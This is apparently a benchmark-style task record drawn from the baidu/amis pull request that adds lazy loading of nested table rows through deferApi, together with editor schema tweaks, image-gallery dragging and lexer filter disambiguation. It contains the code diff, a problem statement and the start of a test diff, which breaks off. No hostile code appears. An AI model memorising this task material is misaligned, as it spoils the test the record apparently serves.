'请输入字段名', + options: flatten(schema?.body ?? schema?.controls ?? []) + .map((item: Record<string, any>) => { + const isFormItem = getRendererByName( + item?.type + )?.isFormItem; + + return isFormItem && typeof item?.name === 'string' + ? 
{label: item.name, value: item.name} + : false; + }) + .filter(Boolean) + }, + itemClassName: 'bg-transparent' + }, + getSchemaTpl('switch', { + name: 'clearPersistDataAfterSubmit', + label: tipedLabel( + '提交成功后清空缓存', + '开启本地缓存并开启本配置项后,表单提交成功后,会自动清除浏览器中当前表单的缓存数据' + ), + pipeIn: defaultValue(false) + }) + ] }, getSchemaTpl('switch', { name: 'canAccessSuperData', diff --git a/packages/amis-editor/src/plugin/Form/InputDate.tsx b/packages/amis-editor/src/plugin/Form/InputDate.tsx index 8c56e150c..62c80d2a5 100644 --- a/packages/amis-editor/src/plugin/Form/InputDate.tsx +++ b/packages/amis-editor/src/plugin/Form/InputDate.tsx @@ -293,7 +293,7 @@ export class DateControlPlugin extends BasePlugin { form.setValues({ placeholder: DateType[type]?.placeholder, - valueFormat: type === 'time' ? 'HH:mm' : 'X', + valueFormat: 'X', displayFormat: DateType[type]?.format, minDate: '', maxDate: '', @@ -308,7 +308,7 @@ export class DateControlPlugin extends BasePlugin { '值格式', '提交数据前将根据设定格式化数据,请参考 <a href="https://momentjs.com/" target="_blank">moment</a> 中的格式用法。' ), - pipeIn: defaultValue('YYYY-MM-DD'), + pipeIn: defaultValue('X'), clearable: true, onChange: ( value: string, diff --git a/packages/amis-editor/src/plugin/Form/InputNumber.tsx b/packages/amis-editor/src/plugin/Form/InputNumber.tsx index 601cfaaa3..a3b7cb8b4 100644 --- a/packages/amis-editor/src/plugin/Form/InputNumber.tsx +++ b/packages/amis-editor/src/plugin/Form/InputNumber.tsx @@ -223,7 +223,47 @@ export class NumberControlPlugin extends BasePlugin { }, getSchemaTpl('prefix'), getSchemaTpl('suffix'), - getSchemaTpl('keyValueMapControl'), + getSchemaTpl('combo-container', { + type: 'combo', + label: '单位选项', + mode: 'normal', + name: 'unitOptions', + items: [ + { + placeholder: '文本', + type: i18nEnabled ? 
'input-text-i18n' : 'input-text', + name: 'label' + }, + { + placeholder: '值', + type: 'input-text', + name: 'value' + } + ], + draggable: false, + multiple: true, + pipeIn: (value: any) => { + if (Array.isArray(value)) { + return value.map(item => + typeof item === 'string' + ? { + label: item, + value: item + } + : item + ); + } + return []; + }, + pipeOut: (value: any[]) => { + if (!value.length) { + return undefined; + } + return value.map(item => + item.value ? item : {label: item.label, value: item.label} + ); + } + }), getSchemaTpl('labelRemark'), getSchemaTpl('remark'), getSchemaTpl('placeholder'), diff --git a/packages/amis-editor/src/plugin/Form/InputTable.tsx b/packages/amis-editor/src/plugin/Form/InputTable.tsx index 28f5b09dc..5449bf410 100644 --- a/packages/amis-editor/src/plugin/Form/InputTable.tsx +++ b/packages/amis-editor/src/plugin/Form/InputTable.tsx @@ -1004,34 +1004,7 @@ export class TableControlPlugin extends BasePlugin { }, getSchemaTpl('description'), getSchemaTpl('placeholder'), - getSchemaTpl('labelRemark'), - { - name: 'columnsTogglable', - label: tipedLabel( - '列显示开关', - '是否展示表格列的显隐控件,“自动”即列数量大于5时自动开启' - ), - type: 'button-group-select', - pipeIn: defaultValue('auto'), - size: 'sm', - labelAlign: 'left', - options: [ - { - label: '自动', - value: 'auto' - }, - - { - label: '开启', - value: true - }, - - { - label: '关闭', - value: false - } - ] - } + getSchemaTpl('labelRemark') ] }, { @@ -1064,6 +1037,43 @@ export class TableControlPlugin extends BasePlugin { { title: '外观', body: getSchemaTpl('collapseGroup', [ + { + title: '基本', + body: [ + { + name: 'columnsTogglable', + label: tipedLabel( + '列显示开关', + '是否展示表格列的显隐控件,“自动”即列数量大于5时自动开启' + ), + type: 'button-group-select', + pipeIn: defaultValue('auto'), + size: 'sm', + labelAlign: 'left', + options: [ + { + label: '自动', + value: 'auto' + }, + + { + label: '开启', + value: true + }, + + { + label: '关闭', + value: false + } + ] + }, + getSchemaTpl('switch', { + name: 'affixHeader', + label: 
'是否固定表头', + pipeIn: defaultValue(false) + }) + ] + }, getSchemaTpl('style:formItem', {renderer: context.info.renderer}), getSchemaTpl('style:classNames', { schema: [ diff --git a/packages/amis-editor/src/plugin/Nav.tsx b/packages/amis-editor/src/plugin/Nav.tsx index 86c6b59ba..0b68a7582 100644 --- a/packages/amis-editor/src/plugin/Nav.tsx +++ b/packages/amis-editor/src/plugin/Nav.tsx @@ -378,7 +378,7 @@ export class NavPlugin extends BasePlugin { // }, { title: '状态', - body: [getSchemaTpl('hidden')] + body: [getSchemaTpl('visible'), getSchemaTpl('hidden')] } ]) }, diff --git a/packages/amis-editor/src/plugin/Progress.tsx b/packages/amis-editor/src/plugin/Progress.tsx index 36b97a4dd..5fe38087e 100644 --- a/packages/amis-editor/src/plugin/Progress.tsx +++ b/packages/amis-editor/src/plugin/Progress.tsx @@ -92,26 +92,6 @@ export class ProgressPlugin extends BasePlugin { needDeleteProps: ['placeholder'], valueType: 'number' // 期望数值类型,不过 amis中会尝试字符串 trans 数值类型 }), - getSchemaTpl('menuTpl', { - label: tipedLabel( - '数值模板', - '值渲染模板,支持JSX、数据域变量使用, 默认 ${value}%' - ), - name: 'valueTpl', - variables: [ - { - label: '值字段', - children: [ - { - label: '进度值', - value: 'value', - tag: 'number' - } - ] - } - ], - requiredDataPropsVariables: true - }), getSchemaTpl('switch', { name: 'showLabel', diff --git a/packages/amis-editor/src/plugin/Service.tsx b/packages/amis-editor/src/plugin/Service.tsx index 47e7088a6..f98aba51a 100644 --- a/packages/amis-editor/src/plugin/Service.tsx +++ b/packages/amis-editor/src/plugin/Service.tsx @@ -273,7 +273,7 @@ export class ServicePlugin extends BasePlugin { }, { title: '状态', - body: [getSchemaTpl('hidden')] + body: [getSchemaTpl('visible'), getSchemaTpl('hidden')] }, { title: '高级', diff --git a/packages/amis-editor/src/tpl/common.tsx b/packages/amis-editor/src/tpl/common.tsx index aa1b95342..1b2d97193 100644 --- a/packages/amis-editor/src/tpl/common.tsx +++ b/packages/amis-editor/src/tpl/common.tsx @@ -792,7 +792,7 @@ setSchemaTpl( return { 
title: '状态', body: [ - getSchemaTpl('newVisible'), + getSchemaTpl('visible'), getSchemaTpl('hidden'), !config?.unsupportStatic && config?.isFormItem ? getSchemaTpl('static') @@ -878,17 +878,6 @@ setSchemaTpl('static', { expressionName: 'staticOn' }); -// 新版配置面板兼容 [可见] 状态 -setSchemaTpl('newVisible', { - type: 'ae-StatusControl', - label: '可见', - mode: 'normal', - name: 'visible', - expressionName: 'visibleOn', - visibleOn: - 'data.visible || data.visible === false || data.visibleOn !== undefined' -}); - setSchemaTpl('hidden', { type: 'ae-StatusControl', label: '隐藏', diff --git a/packages/amis-editor/src/tpl/options.tsx b/packages/amis-editor/src/tpl/options.tsx index 06920b49e..0b507d6f6 100644 --- a/packages/amis-editor/src/tpl/options.tsx +++ b/packages/amis-editor/src/tpl/options.tsx @@ -739,13 +739,3 @@ setSchemaTpl('optionDeleteControl', (params: OptionControlParams) => { } }); }); - -/** - * key value映射类组件 - */ -setSchemaTpl('keyValueMapControl', { - type: 'ae-keyValueMapControl', - label: '单位选项', - name: 'unitOptions', - mode: 'normal' -}); diff --git a/packages/amis-formula/src/lexer.ts b/packages/amis-formula/src/lexer.ts index c48b878c4..18a5288ae 100644 --- a/packages/amis-formula/src/lexer.ts +++ b/packages/amis-formula/src/lexer.ts @@ -1,3 +1,4 @@ +import {getFilters} from './filter'; import {LexerOptions, Token, TokenTypeName} from './types'; export const enum TokenEnum { @@ -171,16 +172,25 @@ function formatNumber(value: string) { return Number(value); } -export function lexer(input: string, options?: LexerOptions) { +export function lexer(input: string, options: LexerOptions = {}) { let line = 1; let column = 1; let index = 0; let mainState = mainStates.START; const states: Array<any> = [mainState]; let tokenCache: Array<Token> = []; - const allowFilter = options?.allowFilter !== false; + options = {...options}; + const allowFilter = options.allowFilter !== false; - if (options?.evalMode || options?.variableMode) { + if (!options.isFilter) { + const 
filterKeys = Object.keys(getFilters()); + if ((options as any).filters) { + filterKeys.push(...Object.keys((options as any).filters)); + } + options.isFilter = (name: string) => filterKeys.includes(name); + } + + if (options.evalMode || options.variableMode) { pushState(mainStates.EXPRESSION); } @@ -370,6 +380,16 @@ export function lexer(input: string, options?: LexerOptions) { token.value === '|' && allowFilter ) { + // 怎么区分是过滤还是位运算呢? + // 靠外面反馈吧 + if (options?.isFilter) { + const restInput = input.substring(token.start.index + 1).trim(); + const m = /^[A-Za-z0-9_$@][A-Za-z0-9_\-$@]*/.exec(restInput); + if (!m || !options.isFilter(m[0])) { + return token; + } + } + pushState(mainStates.Filter); return { type: TokenName[TokenEnum.OpenFilter], diff --git a/packages/amis-formula/src/types.ts b/packages/amis-formula/src/types.ts index 39c967bff..a675707ff 100644 --- a/packages/amis-formula/src/types.ts +++ b/packages/amis-formula/src/types.ts @@ -61,6 +61,8 @@ export interface LexerOptions { * ${abc | html} */ allowFilter?: boolean; + + isFilter?: (name: string) => boolean; } export type TokenTypeName = diff --git a/packages/amis-ui/scss/components/_image-gallery.scss b/packages/amis-ui/scss/components/_image-gallery.scss index 54dfee091..ad4c2b075 100644 --- a/packages/amis-ui/scss/components/_image-gallery.scss +++ b/packages/amis-ui/scss/components/_image-gallery.scss @@ -54,13 +54,22 @@ justify-content: center; align-items: center; user-select: none; + overflow: hidden; > img { + cursor: move; + cursor: -webkit-grab; display: block; max-width: 100%; max-height: 100%; transition: transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s; } + + &.is-dragging > img { + transition: none; + user-select: none; + cursor: -webkit-grabbing; + } } &-prevBtn, @@ -216,6 +225,7 @@ .#{$ns}ImageGallery-toolbar { background-color: var(--image-images-preview-bgColor); border-radius: var(--image-images-preview-radius); + box-shadow: 0 2px 6px 0 rgba(211, 211, 211, 0.5); display: flex; 
align-items: flex-start; padding: var(--image-images-preview-paddingTop) diff --git a/packages/amis-ui/scss/components/_table.scss b/packages/amis-ui/scss/components/_table.scss index b0976d487..d93fd7ab9 100644 --- a/packages/amis-ui/scss/components/_table.scss +++ b/packages/amis-ui/scss/components/_table.scss @@ -620,6 +620,10 @@ > thead > tr > th.#{$ns}Table-primayCell, > tbody > tr > td.#{$ns}Table-primayCell { white-space: nowrap; // 树形表格展示标题栏,不要换行 + + > .#{$ns}Spinner { + vertical-align: middle; + } } } @@ -864,6 +868,14 @@ } } + &-retryBtn { + color: var(--Form-feedBack-color); + cursor: pointer; + &:hover { + color: var(--Form-feedBack-color); + } + } + &-expandBtn, &-expandBtn2 { position: relative; diff --git a/packages/amis-ui/scss/components/form/_tree.scss b/packages/amis-ui/scss/components/form/_tree.scss index 397dc5d1e..7f6feee9f 100644 --- a/packages/amis-ui/scss/components/form/_tree.scss +++ b/packages/amis-ui/scss/components/form/_tree.scss @@ -199,6 +199,7 @@ height: var(--Tree-itemHeight); line-height: var(--Tree-itemHeight); padding-right: var(--Tree-icon-gap); + flex-shrink: 0; > a { display: inline-block; @@ -359,7 +360,6 @@ &-itemText { cursor: pointer; - flex: 1 auto; display: inline-block; color: var(--inputTree-base-default-color); font-size: var(--select-tree-fontSize); diff --git a/packages/amis-ui/src/components/ImageGallery.tsx b/packages/amis-ui/src/components/ImageGallery.tsx index 9500ede08..1dda61f62 100644 --- a/packages/amis-ui/src/components/ImageGallery.tsx +++ b/packages/amis-ui/src/components/ImageGallery.tsx @@ -49,6 +49,14 @@ export interface ImageGalleryState { scale: number; /** 图片旋转角度 */ rotate: number; + /** + * 水平位移 + */ + tx: number; + /** + * 垂直位移 + */ + ty: number; /** 是否开启操作栏 */ showToolbar?: boolean; /** 是否显示底部图片集 */ @@ -89,6 +97,8 @@ export class ImageGallery extends React.Component< isOpened: false, index: -1, items: [], + tx: 0, + ty: 0, scale: 1, rotate: 0, showToolbar: false, @@ -103,8 +113,10 @@ export 
class ImageGallery extends React.Component< ref.addEventListener('wheel', this.onWheelScroll, { passive: false }); + ref.addEventListener('mousedown', this.onMouseDown); } else { this.galleryMain?.removeEventListener('wheel', this.onWheelScroll); + this.galleryMain?.removeEventListener('mousedown', this.onMouseDown); } this.galleryMain = ref; @@ -128,6 +140,38 @@ export class ImageGallery extends React.Component< } } + startX = 0; + startY = 0; + startTx = 0; + startTy = 0; + + @autobind + onMouseDown(event: MouseEvent) { + this.galleryMain?.classList.add('is-dragging'); + document.body.addEventListener('mousemove', this.onMouseMove); + document.body.addEventListener('mouseup', this.onMouseUp); + + this.startX = event.clientX; + this.startY = event.clientY; + this.startTx = this.state.tx; + this.startTy = this.state.ty; + } + + @autobind + onMouseMove(event: MouseEvent) { + this.setState({ + tx: this.startTx + event.clientX - this.startX, + ty: this.startTy + event.clientY - this.startY + }); + } + + @autobind + onMouseUp() { + this.galleryMain?.classList.remove('is-dragging'); + document.body.removeEventListener('mousemove', this.onMouseMove); + document.body.removeEventListener('mouseup', this.onMouseUp); + } + @autobind handleImageEnlarge(info: { src: string; @@ -151,6 +195,10 @@ export class ImageGallery extends React.Component< this.setState({ isOpened: true, + tx: 0, + ty: 0, + rotate: 0, + scale: 1, items: info.list ? 
info.list : [info], index: info.index || 0, /* children组件可以控制工具栏的展示 */ @@ -207,23 +255,35 @@ export class ImageGallery extends React.Component< switch (action.key) { case ImageActionKey.ROTATE_LEFT: - this.setState(prevState => ({rotate: prevState.rotate - 90})); + this.setState(prevState => ({ + rotate: prevState.rotate - 90, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ROTATE_RIGHT: - this.setState(prevState => ({rotate: prevState.rotate + 90})); + this.setState(prevState => ({ + rotate: prevState.rotate + 90, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ZOOM_IN: - this.setState(prevState => ({scale: prevState.scale + 0.5})); + this.setState(prevState => ({ + scale: prevState.scale + 0.5, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ZOOM_OUT: this.setState(prevState => { return prevState.scale - 0.5 > 0 - ? {scale: prevState.scale - 0.5} + ? {scale: prevState.scale - 0.5, tx: 0, ty: 0} : null; }); break; case ImageActionKey.SCALE_ORIGIN: - this.setState(() => ({scale: 1})); + this.setState(() => ({scale: 1, tx: 0, ty: 0})); break; } @@ -280,6 +340,8 @@ export class ImageGallery extends React.Component< items, rotate, scale, + tx, + ty, showToolbar, enlargeWithGallary, actions, @@ -320,8 +382,11 @@ export class ImageGallery extends React.Component< ref={this.galleryMainRef} > <img + draggable={false} src={items[index].originalSrc} - style={{transform: `scale(${scale}) rotate(${rotate}deg)`}} + style={{ + transform: `translate(${tx}px, ${ty}px) scale(${scale}) rotate(${rotate}deg)` + }} /> {showToolbar && Array.isArray(actions) && actions.length > 0 diff --git a/packages/amis-ui/src/components/Tree.tsx b/packages/amis-ui/src/components/Tree.tsx index 5766cbf71..047bf6c93 100644 --- a/packages/amis-ui/src/components/Tree.tsx +++ b/packages/amis-ui/src/components/Tree.tsx @@ -37,6 +37,7 @@ import {LocaleProps, localeable} from 'amis-core'; import Spinner, {SpinnerExtraProps} from './Spinner'; import {ItemRenderStates} from './Selection'; import 
VirtualList from './virtual-list'; +import TooltipWrapper from './TooltipWrapper'; interface IDropIndicator { left: number; @@ -1275,33 +1276,42 @@ export class TreeSelector extends React.Component< !(item.defer && !item.loaded) ? ( <div className={cx('Tree-item-icons')}> {creatable && hasAbility(item, 'creatable') ? ( - <a - onClick={this.handleAdd.bind(this, item)} - data-tooltip={__(createTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(createTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="plus" className="icon" /> - </a> + <a onClick={this.handleAdd.bind(this, item)}> + <Icon icon="plus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {removable && hasAbility(item, 'removable') ? ( - <a - onClick={this.handleRemove.bind(this, item)} - data-tooltip={__(removeTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(removeTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="minus" className="icon" /> - </a> + <a onClick={this.handleRemove.bind(this, item)}> + <Icon icon="minus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {editable && hasAbility(item, 'editable') ? 
( - <a - onClick={this.handleEdit.bind(this, item)} - data-tooltip={__(editTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(editTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="new-edit" className="icon" /> - </a> + <a onClick={this.handleEdit.bind(this, item)}> + <Icon icon="new-edit" className="icon" /> + </a> + </TooltipWrapper> ) : null} </div> ) : null} diff --git a/packages/amis-ui/src/locale/de-DE.ts b/packages/amis-ui/src/locale/de-DE.ts index 2e687fabe..0d685fb5a 100644 --- a/packages/amis-ui/src/locale/de-DE.ts +++ b/packages/amis-ui/src/locale/de-DE.ts @@ -197,6 +197,8 @@ register('de-DE', { 'Options.editLabel': 'Bearbeiten {{label}}', 'Options.label': 'Option', 'Options.createFailed': 'Erstellen fehlgeschlagen', + 'Options.retry': + "Laden fehlgeschlagen '{{reason}}', klicken Sie auf Wiederholen", 'placeholder.empty': '<Empty>', 'placeholder.enter': 'Eingabe', 'placeholder.noData': 'Keine Daten', diff --git a/packages/amis-ui/src/locale/en-US.ts b/packages/amis-ui/src/locale/en-US.ts index 605c4884f..481361a3b 100644 --- a/packages/amis-ui/src/locale/en-US.ts +++ b/packages/amis-ui/src/locale/en-US.ts @@ -189,6 +189,7 @@ register('en-US', { 'Options.editLabel': 'Edit {{label}}', 'Options.label': 'option', 'Options.createFailed': 'create failed, please check', + 'Options.retry': "Loading failed '{{reason}}', click retry", 'placeholder.empty': '<Empty>', 'placeholder.enter': 'Enter', 'placeholder.noData': 'No data', diff --git a/packages/amis-ui/src/locale/zh-CN.ts b/packages/amis-ui/src/locale/zh-CN.ts index ccea50181..95e19b697 100644 --- a/packages/amis-ui/src/locale/zh-CN.ts +++ b/packages/amis-ui/src/locale/zh-CN.ts @@ -194,6 +194,7 @@ register('zh-CN', { 'Options.editLabel': '编辑{{label}}', 'Options.label': '选项', 'Options.createFailed': '新增失败,请仔细检查', + 'Options.retry': '加载失败「{{reason}}」,点击重试', 'placeholder.empty': '<空>', 'placeholder.enter': '请输入', 'placeholder.noData': '暂无数据', diff --git 
a/packages/amis/src/renderers/CRUD.tsx b/packages/amis/src/renderers/CRUD.tsx index d453d176b..a140cf8d3 100644 --- a/packages/amis/src/renderers/CRUD.tsx +++ b/packages/amis/src/renderers/CRUD.tsx @@ -132,6 +132,11 @@ export interface CRUDCommonSchema extends BaseSchema, SpinnerExtraProps { */ api?: SchemaApi; + /** + * 懒加载 API,当行数据中用 defer: true 标记了,则其孩子节点将会用这个 API 来拉取数据。 + */ + deferApi?: SchemaApi; + /** * 批量操作 */ diff --git a/packages/amis/src/renderers/Table/Cell.tsx b/packages/amis/src/renderers/Table/Cell.tsx index 293974224..9da470971 100644 --- a/packages/amis/src/renderers/Table/Cell.tsx +++ b/packages/amis/src/renderers/Table/Cell.tsx @@ -9,7 +9,7 @@ import { buildTrackExpression, evalTrackExpression } from 'amis-core'; -import {BadgeObject, Checkbox, Icon} from 'amis-ui'; +import {BadgeObject, Checkbox, Icon, Spinner} from 'amis-ui'; import React from 'react'; export interface CellProps extends ThemeProps { @@ -32,6 +32,7 @@ export interface CellProps extends ThemeProps { popOverContainer?: any; quickEditFormRef: any; onImageEnlarge?: any; + translate: (key: string, ...args: Array<any>) => string; } export default function Cell({ @@ -51,7 +52,8 @@ export default function Cell({ onDragStart, popOverContainer, quickEditFormRef, - onImageEnlarge + onImageEnlarge, + translate: __ }: CellProps) { if (column.name && item.rowSpans[column.name] === 0) { return null; @@ -134,7 +136,18 @@ export default function Cell({ /> ); prefix.push( - item.expandable ? ( + item.loading ? ( + <Spinner key="loading" size="sm" show /> + ) : item.error ? ( + <a + className={cx('Table-retryBtn')} + key="retryBtn" + onClick={item.resetDefered} + data-tooltip={__('Options.retry', {reason: item.error})} + > + <Icon icon="retry" className="icon" /> + </a> + ) : item.expandable ? ( <a key="expandBtn2" className={cx('Table-expandBtn2', item.expanded ? 
'is-active' : '')} @@ -169,7 +182,13 @@ export default function Cell({ ); } return [prefix, affix, addtionalClassName]; - }, [item.expandable, item.expanded, column.isPrimary]); + }, [ + item.expandable, + item.expanded, + item.error, + item.loading, + column.isPrimary + ]); // 根据条件缓存 data,避免孩子重复渲染 const hasCustomTrackExpression = diff --git a/packages/amis/src/renderers/Table/TableRow.tsx b/packages/amis/src/renderers/Table/TableRow.tsx index 388dc063e..83434f74c 100644 --- a/packages/amis/src/renderers/Table/TableRow.tsx +++ b/packages/amis/src/renderers/Table/TableRow.tsx @@ -60,6 +60,8 @@ export class TableRow extends React.PureComponent< depth: number; expandable: boolean; appeard?: boolean; + loading?: boolean; + error?: string; checkdisable: boolean; trRef?: React.Ref<any>; isNested?: boolean; @@ -362,6 +364,8 @@ export default observer((props: TableRowProps) => { depth={item.depth} expandable={item.expandable} checkdisable={item.checkdisable} + loading={item.loading} + error={item.error} // data 在 TableRow 里面没有使用,这里写上是为了当列数据变化的时候 TableRow 重新渲染, // 不是 item.locals 的原因是 item.locals 会变化多次,比如父级上下文变化也会进来,但是 item.data 只会变化一次。 data={canAccessSuperData ? 
item.locals : item.data} diff --git a/packages/amis/src/renderers/Table/index.tsx b/packages/amis/src/renderers/Table/index.tsx index 59f43d2d6..cee5ca66d 100644 --- a/packages/amis/src/renderers/Table/index.tsx +++ b/packages/amis/src/renderers/Table/index.tsx @@ -7,7 +7,8 @@ import { SchemaExpression, position, animation, - evalExpressionWithConditionBuilder + evalExpressionWithConditionBuilder, + isEffectiveApi } from 'amis-core'; import {Renderer, RendererProps} from 'amis-core'; import {SchemaNode, ActionObject, Schema} from 'amis-core'; @@ -71,6 +72,7 @@ import ColGroup from './ColGroup'; import debounce from 'lodash/debounce'; import AutoFilterForm from './AutoFilterForm'; import Cell from './Cell'; +import {reaction} from 'mobx'; /** * 表格列,不指定类型时默认为文本类型。 @@ -343,6 +345,11 @@ export interface TableSchema extends BaseSchema { * table layout */ tableLayout?: 'fixed' | 'auto'; + + /** + * 懒加载 API,当行数据中用 defer: true 标记了,则其孩子节点将会用这个 API 来拉取数据。 + */ + deferApi?: SchemaApi; } export interface TableProps extends RendererProps, SpinnerExtraProps { @@ -640,6 +647,18 @@ export default class Table extends React.Component<TableProps, object> { formItem && isAlive(formItem) && formItem.setSubStore(store); Table.syncRows(store, this.props, undefined) && this.syncSelected(); + + this.toDispose.push( + reaction( + () => + store + .getExpandedRows() + .filter( + row => row.defer && !row.loaded && !row.loading && !row.error + ), + (rows: Array<IRow>) => rows.forEach(this.loadDeferredRow) + ) + ); } static syncRows( @@ -711,6 +730,34 @@ export default class Table extends React.Component<TableProps, object> { } } + @autobind + async loadDeferredRow(row: IRow) { + const {env} = this.props; + const deferApi = row.data.deferApi || this.props.deferApi; + + if (!isEffectiveApi(deferApi)) { + throw new Error('deferApi is required'); + } + + try { + row.markLoading(true); + + const response = await env.fetcher(deferApi, row.locals); + if (!response.ok) { + throw new 
Error(response.msg); + } + + row.setDeferData(response.data); + row.markLoaded(true); + row.setError(''); + } catch (e) { + row.setError(e.message); + env.notify('error', e.message); + } finally { + row.markLoading(false); + } + } + /** * 自动设置表格高度占满界面剩余区域 * 用 css 实现有点麻烦,要改很多结构,所以先用 dom hack 了,避免对之前的功能有影响 @@ -2024,7 +2071,8 @@ export default class Table extends React.Component<TableProps, object> { checkOnItemClick, popOverContainer, canAccessSuperData, - itemBadge + itemBadge, + translate } = this.props; return ( @@ -2047,6 +2095,7 @@ export default class Table extends React.Component<TableProps, object> { popOverContainer={this.getPopOverContainer} quickEditFormRef={this.subFormRef} onImageEnlarge={this.handleImageEnlarge} + translate={translate} /> ); }
fix: 处理input-number单位选项交互;input-table展示列配置项位置处理 & progress组件配置面板去除模版配置项 feat:组件状态支持"可见"配置项 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 3514f38</samp> This pull request updates and improves the schema templates for editing various `amis` components in the `amis-editor`. It adds the `visible` property to some components, reorganizes the `table` component options, adds the unit options for the `input-number` component, and removes some unsupported or redundant properties. It also fixes some compatibility and internationalization issues. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 3514f38</samp> > _Some schema templates were added or removed_ > _To make `amis` components improved_ > _The `visible` property was made consistent_ > _The `valueTpl` option became nonexistent_ > _And some options were repositioned or moved_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 3514f38</samp> * Add a schema template for the `visible` property to various components, using the `common` file ([link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-851dba93506fd34484adaa1d720285d572d18ca4392a0c4893fca27c4159fa92R256), [link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-09783eec140bf3c70e8dd5932d5b8108bd6777cd334ea0a27322d0f09586de29L381-R381), [link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-6a2f7c2cc26a108293bdd2d7ca6ca8d6b06acbf8e2d17424a50526d6affa6f67L276-R276), [link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-a4359e1efbe3c320ab402ee14a9fa73386e3da07b3f27049dcbc13a91c314c05L795-R795), [link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-a4359e1efbe3c320ab402ee14a9fa73386e3da07b3f27049dcbc13a91c314c05L881-L891)) * Modify the schema template for the `NumberControlPlugin` in `InputNumber.tsx`, adding a new option for unit options and using the `i18nEnabled` variable 
([link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-c459de2eb5b316e5e49ab103c7fa1a03c20cf7693bd79b8e039e782b48c5731aL226-R264)) * Reorganize the schema template for the `TableControlPlugin` in `InputTable.tsx`, moving the `columnsTogglable` property and adding the `affixHeader` property ([link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8L1007-R1007), [link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8R1040-R1076)) * Remove the schema template for the `valueTpl` property from the `ProgressPlugin` in `Progress.tsx`, as it is not supported by the `progress` component ([link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-6ddce7589047fa0b03657030e041891a72416ebd3a417d35e6006b8428cae731L95-L114)) * Remove the schema template for the `keyValueMapControl` property from the `options` file, as it is replaced by the `combo-container` type ([link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-4ff8190ccb19edb2d788deb7ebf73420c1799a07d6061d2aeb89ab77e9e66b95L742-L751))
**Title** Add lazy‑load support for nested tables/CRUD and related UX, schema, and utility updates **Problem** Nested tables in the CRUD component could not load child rows on demand, leaving users unable to view deep data without pre‑loading everything. The editor also lacked a consistent “visible” control and unit option handling for number inputs, and the text‑replacement utility only accepted an array of ignored keys, limiting flexibility. **Root Cause** The table store and row models were not designed to flag deferred rows or trigger asynchronous loading, and the schema templates missed the “visible” field and unit options. The replace‑text helper’s API was too restrictive, and API calls never carried a request‑context payload. **Fix / Expected Behavior** - Introduce a `deferApi` attribute for CRUD/Table to fetch children of rows marked with `defer: true`. - Extend row state with loading, error, and deferred‑data flags; automatically request missing children when expanded. - Show a spinner while loading and a retry button with tooltip on failure. - Update documentation to describe nested data, lazy loading, and the new `deferApi` property. - Add a unified “visible” schema template and expose it in relevant component editors. - Provide a combo control for number‑input unit options. - Allow `replaceTextIgnoreKeys` to be a function (or array) for more granular key exclusion. - Inject the current data context into every API request (`api.context`). - Minor style tweaks for image gallery dragging, table toolbar shadows, and tooltip placement. - Remove unsupported `valueTpl` from the progress component. **Risk & Validation** - Verify that expanding a deferred row triggers a single API call and correctly populates child rows without duplicate requests. - Ensure the spinner, retry UI, and tooltip display correctly across themes and do not interfere with existing table interactions. 
- Run the suite of editor schema tests to confirm the new “visible” and unit‑option configurations render and persist as expected. - Test replace‑text functionality with both array and function ignore definitions to confirm no regression.
8,515
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index fb30171c4..32d23b1e5 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -580,3 +580,9 @@ test('evalute:namespace', () => { expect(evaluate('${ls: &["c"]["c"]}', {})).toMatchObject({d: 4}); expect(evaluate('${ls: &["c"][key]}', {})).toMatchObject({d: 4}); }); + +test('evalute:speical characters', () => { + // 优先识别成位运算,而不是过滤器 + expect(evaluate('${1 | 2}', {})).toBe(3); + expect(evaluate('${1 | abc}', {abc: 2})).toBe(3); +}); diff --git a/packages/amis-formula/__tests__/lexer.test.ts b/packages/amis-formula/__tests__/lexer.test.ts index 773032b1d..e431f3d24 100644 --- a/packages/amis-formula/__tests__/lexer.test.ts +++ b/packages/amis-formula/__tests__/lexer.test.ts @@ -31,13 +31,19 @@ test('lexer:simple', () => { test('lexer:filter', () => { expect( getTokens('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - evalMode: false + evalMode: false, + filters: { + date() {} + } }) ).toMatchSnapshot(); expect( getTokens('\\$abc is ${abc | isTrue : trueValue : falseValue}', { - evalMode: false + evalMode: false, + filters: { + isTrue() {} + } }) ).toMatchSnapshot(); }); @@ -55,7 +61,10 @@ test('lexer:exception', () => { expect(() => getTokens('${a | filter: \\x2}', { - evalMode: false + evalMode: false, + filters: { + filter() {} + } }) ).toThrow('Unexpected token x in 1:17'); }); diff --git a/packages/amis-formula/__tests__/parser.test.ts b/packages/amis-formula/__tests__/parser.test.ts index 